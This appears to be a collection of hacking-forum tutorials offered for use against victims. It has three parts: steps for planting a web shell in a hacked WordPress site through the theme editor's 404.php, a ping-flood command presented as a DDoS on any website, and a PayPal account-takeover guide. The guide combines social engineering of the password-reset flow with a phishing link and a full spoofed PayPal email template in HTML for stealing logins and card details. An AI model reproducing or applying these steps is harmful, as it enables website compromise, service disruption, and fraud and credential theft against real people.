Shell Upload in Wordpress

Wordpress Shell Upl0ading...

---------------------------|

Start

Today im Going To Sh0w y0uh h0w To Upl0AD Shell

On WordPRess....... Easy waY.... ;) ;)

===========/

1) Wordpress Site +Username +Password 2) MadSpot Security Team Shell =))

....------/

1) Login To y0ur hacked WordpREss SiTe...

2) nOw gOt0 Theme Editor..

   --- wp-admin/theme-editor.php

3) On y0ur Right Side..Choose 404.php

4) Edit it And Paste Y0ur Madspot Shell Code in 404.php nd Save !t..

5) Now, you will see some thing like :

---- /home/Themename/public_html/wp-content/themes/themename/404.php&theme=themename&a=te&scrollto=0

6) Now Delete every thing before /wp-content/ and every thing after 404.php....

7) URl will be www.site.com/wp-content/themes/themename/404.php

7) Now Press Enter and Shell Execute ;)

 Note:- This Is Just For Educational Purpose ONLY!

Ddos Attack With Command Prompt

 Send A DDOS Attack Using CMD

DoS Attack With Your Home Pc To Any WebSite U Want To Be Killed!!

------------------------
DoS Attack Stands For Denial of Service Attack
------------------------
What Is DoS?

A: Denial of Service (DoS) attackes are aggressive attacks on an individual Computer or WebSite with intent to deny services to intended users.
DoS attackes can target end-user systems, servers, routers and Network links(websites)

Requirments:
1- Command Prompt (CMD or DOS) Which is usually integrated in all Windows.
2- Ip-Address of Targeted Site.

How TO GET IP OF ANY SITE??"
No problem.. here is the solution..
open ur CMD (command prompt).. and type
--------------------------------------------------
nslookup Site-Name 
--------------------------------------------------
(e.g nslookup www.google.com)

It will show u ip of the site.

ohk now write this command in CMD For Attack on Any Site/ Server..
---------------------------------------------------
ping SITE-IP -l 65500 -n 10000000 -w 0.00001
---------------------------------------------------
-n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desired value u want to attempt attack.

SITE-IP= Replace the text with the ip address of the site u want to be attacked..

-w 0.00001 = It is the waiting time after one ping attack.

NOTE: Dont Change or Remove -l, -n and -w in this command.. otherwise u will not able to attack
Enjoy :)

Hack Paypal Account Easy Way

Cracking PayPal Accounts!



Well! Cracking involves many method! Social Engineering, Guessing.....But the probability of this method is very low!



Social Engineering:In this method u know whom u are gonna hack and have contact with them!



1. Lets consider that u are making some deals with some person, whos pp u
are gonna hack!so probably u wuld know his Paypal E-mail...2. Now try 
to collect as much as info that u could possibly collect from him, like 
phone numbers, address[For address u could make a transcation with him 
and u could easily obtain his Address]3. Now go to Pyapal website! clik 
on "Forgot Password" or "forgot E-mail" prefer forgot email method! and a
bit easier!Try with all the infos u have about him! this should more 
probably work!



Gettin more infos about the victim!If u select forgot password from 
paypal site, after entering the e-mail and the visula confirmation text 
in the preferred box u could see a drop down boxwhich contains last 
digits of Credit cards Bank Accounts and Phone numbers!Its better to 
take a note of all these!



[Try cacking with this info]



Lets come to the main part! Phishing



The current situation has become worser! even if u had successfully 
Phished a PP account u get the SECURITY MEASURE limitation in minutes!



So! have to start a new method of phishing!



Before going further Download the Phisher [The code has not been 
completed,Those who knows download them and modify a bit]Download 
HereSteps:



1. Hmmm.Ok.. got ur phisher! and as i said u should have known Victims CC's Last 2 Digits!



2. Now put in ur link as



Code:

http://ur_site.com/index.php?cc=XX

[XX=Last two digits of CC number u got]



3. Now thats it ur phisher is all set and now and now u have to send only the link to ur victim!



E-mail Format:



Code:

<html lang="en-GB"><head> <meta content="text/html; 
charset=utf-8" http-equiv="Content-Type"> <style 
type="text/css"></style> <script>



</script><script charset="utf-8" id="injection_graph_func" 
src="mail%20format_files/injection_graph_func.js"></script></head><body
bgcolor="#ffffff"> <table align="center" bgcolor="#cccccc" 
border="0" cellpadding="1" cellspacing="0" width="98%"> <tr> 
<td> <a name="m_11bef44b7766d974"></a><table 
bgcolor="#efefef" border="0" cellpadding="1" cellspacing="0" 
width="100%" height="843"> <tbody><tr 
bgcolor="#ffffff"><td height="820"> <div> <div 
style="width: 831; height: 882"><table align="center" border="0" 
cellpadding="0" cellspacing="0" width="600"><tbody><tr 
valign="top"><td><a href="https://www.paypal.com/row" 
target="_blank"><img src="mail%20format_files/email_logo.gif" 
alt="PayPal" border="0" width="255" 
height="35"></a></td></tr></tbody></table><table
align="center" border="0" cellpadding="0" cellspacing="0" 
width="100%"><tbody><tr><td 
background="mail%20format_files/bg_clk.gif" width="100%"><img 
alt="" src="mail%20format_files/pixel.gif" border="0" height="29" 
width="1"></td></tr><tr><td><img alt="" 
src="mail%20format_files/pixel.gif" border="0" height="10" 
width="1"></td></tr></tbody></table><table
align="center" border="0" cellpadding="0" cellspacing="0" 
width="600"><tbody><tr><td></td></tr></tbody></table><table
align="center" border="0" cellpadding="0" cellspacing="0" width="600" 
height="821"><tbody><tr valign="top"><td width="100%" 
height="821"><table align="right" bgcolor="#cccccc" border="0" 
cellpadding="1" cellspacing="0" 
width="190"><tbody><tr><td><table align="center"
bgcolor="#ffffff" border="0" cellpadding="0" cellspacing="0" 
width="100%"><tbody><tr><td><table 
align="center" bgcolor="#eeeeee" border="0" cellpadding="5" 
cellspacing="0" width="100%"><tbody><tr><td 
align="center"><span>PayPal – The safer, easier way to 
pay</span></td></tr></tbody></table><table
align="center" border="0" cellpadding="5" cellspacing="0" 
width="100%"><tbody><tr><td><ul><li>Use
your credit card without exposing your card number to 
merchants.</li></ul><ul><li>Speed through 
checkout without stopping to enter your card number or 
address.</li></ul><ul><li>Send money to family 
and friends for free.</li></ul><p><img alt="" 
src="mail%20format_files/pixel.gif" border="0" height="5" 
width="1"></td></tr></tbody></table></td></tr></tbody></table><table
align="center" bgcolor="#ffffff" border="0" cellpadding="0" 
cellspacing="0" 
width="100%"><tbody><tr><td><table 
align="center" bgcolor="#eeeeee" border="0" cellpadding="5" 
cellspacing="0" width="100%"><tbody><tr><td 
align="center">Fight fake 
emails</td></tr></tbody></table><table 
align="center" border="0" cellpadding="5" cellspacing="0" 
width="100%"><tbody><tr><td><ul><li>Forward
suspicious emails to <a 
href="http://mail.google.com/mail/h/14j2r4...f%40paypal.com" 
target="_blank">spoof@paypal.com</a>.</li></ul><ul><li>Make
sure you're using the latest internet 
browser.</li></ul><ul><li>Visit the PayPal 
Security Center.</li></ul><p><br><img alt="" 
src="mail%20format_files/pixel.gif" border="0" height="5" 
width="1"></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr><td></td></tr></tbody></table><p><span>Confirm
Your Email Address!<br><br></span>Dear Black 
Bay,<br><br></p><p>To complete your 
<span>PayPal account</span>, you must <span>click the 
link below</span> and enter your password on the following page to
confirm your email address.</p><table align="center" 
bgcolor="#ffe65c" border="0" cellpadding="1" cellspacing="0" 
width="300"><tbody><tr><td><table align="center"
bgcolor="#fffecd" border="0" cellpadding="4" cellspacing="0" 
width="100%"><tbody><tr><td align="center"><a 
href="https://www.paypal.com/row/ece/cn=14...gp%2e89%40gmai l%2ecom" 
target="_blank">Click here to activate your 
account</a></td></tr></tbody></table></td></tr></tbody></table><p><br></p><p>You
can also confirm your email address by logging into your PayPal account
at <a href="https://www.paypal.com/row/" 
target="_blank">https://www.paypal.com/row/</a>. Click on 
<span>Confirm Email</span> in the <span>To Do 
List</span> and then enter this confirmation number: 
1423-5450-0472-3892-5873<br><br>Sincerely,<br>PayPal<br><br></p><hr><p>Please
do not reply to this email. This mailbox is not monitored and you will 
not receive a response. For assistance, <a 
href="https://www.paypal.com/row/cgi-bin/?cmd=_login-run" 
target="_blank">log in</a> to your PayPal account and click the
Help link in the top right corner of any PayPal 
page.<br><br>To receive email notifications in plain text 
instead of HTML, <a href="https://www.paypal.com/row/PREFS-NOTI" 
target="_blank">update your 
preferences</a>.</p><p><br><br></p><hr
width="400"><p><span>Copyright ? 1999-2008 PayPal. All 
rights reserved.<br><br>Consumer advisory- PayPal Pte. Ltd.,
the holder of PayPal’s stored value<br>facility, does not require
the approval of the Monetary Authority of Singapore.<br>Users are
advised to read the terms and conditions 
carefully.<br></span><br><span>PayPal Email ID 
PP468</span></p><p></p></td></tr></tbody></table></div>
</div> </td></tr></tbody></table> <a 
name="m_"></a> </td> </tr> </table> 
</body></html>



This is a Basic Format [Layout]Change the text contents as ur Needs]



[Tips: Before Sending the Phisher link go to paypal site and Clik on 
"Forgot Password" and select Verfication By E-mail! Do this 3-5 times. 
this would make the scene better]



Now u can tell ur victim that his account has been accessed by Third Person blah-blah-- Make the email more better!



If he logs in Then u could get his Login e-mail, password and probably 
his cc! so no need to panic for "SECURITY MEASURES LIMITATION"




The Success Rate in this process is to High
If any problem feel free To Comment